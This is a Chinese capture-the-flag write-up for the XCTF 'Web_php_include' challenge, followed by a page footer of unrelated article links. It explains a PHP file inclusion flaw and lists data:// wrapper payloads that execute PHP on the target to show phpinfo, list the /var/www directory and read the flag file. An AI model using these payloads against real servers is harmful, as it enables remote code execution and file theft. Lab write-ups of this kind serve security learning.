32.攻防世界Web_php_include

进入场景

echo $_GET'hello' 直接将用户通过 GET 方法提交的 hello 参数值输出到页面上,这可能会导致 XSS(跨站脚本攻击)漏洞。

在下面的代码中,虽然对 page 中的 php:// 进行了替换处理,但是仍然存在文件包含漏洞的风险。如果我们能够通过 _GET'page' 传入一个恶意的文件路径,就可能导致服务器上的任意文件被包含和执行

"file://"是一种用于指定本地文件系统中文件的URI(统一资源标识符)协议。通过"file://"协议,可以在浏览器或其他支持该协议的应用程序中访问本地文件

"data://"协议是 PHP 中的一种数据流协议,它允许将数据作为文件来读取。该协议的语法如下:data:(<mediatype>)(;base64),<data>,其中,<mediatype>是可选的媒体类型,<data>是数据内容。

测试

/?page=data://text/plain,<?php phpinfo()?>

目录路径

/?page=data://text/plain,<?php echo $_SERVER'DOCUMENT_ROOT'; ?>

目录文件

/?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

读取文件内容

/?page=data://text/plain,<?php a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars(a); ?>

相关推荐
传奇开心果编程3 分钟前
【Go入门练中学】第1课:从零开始
后端·学习·golang
AI行业应用研究11 分钟前
会务问答机器人落地拆解:三级路由、知识库组织与防幻觉——会务小程序能自己回答参会者提问吗?
大数据·人工智能·安全·小程序·架构
维克兜率天19 分钟前
5.3 宏观因子:抬头看天
笔记·python·深度学习·算法·量化
LuminousCPP20 分钟前
数据结构-排序(五):计数排序与排序专题阶段总结|从外部归并到线性排序,再看算法边界与选型
c语言·数据结构·笔记·算法·排序算法
Thneonl28 分钟前
照着 CKS 教材做实验,把 apiserver 干瘫了 7 分钟
安全·kubernetes
zhuobattle29 分钟前
Anthropic 2026年9月威胁情报报告:AI滥用安全风险总结
安全·ai安全·大模型安全
钓鱼的肝35 分钟前
csp-j-s总结(1)
c++·笔记·算法·青少年编程
yu_zhidun36 分钟前
终端安全DLP需求拆解与完整落地规划
安全·数据安全·域智盾·域智盾软件·企业终端dlp
域智盾系统来啦38 分钟前
方案设计:文件生命周期管理安全建设需求拆解与落地方案
安全·域智盾软件·文件生命周期管理
The Chosen One98541 分钟前
OS第二章随手记(2.1)
linux·运维·服务器·笔记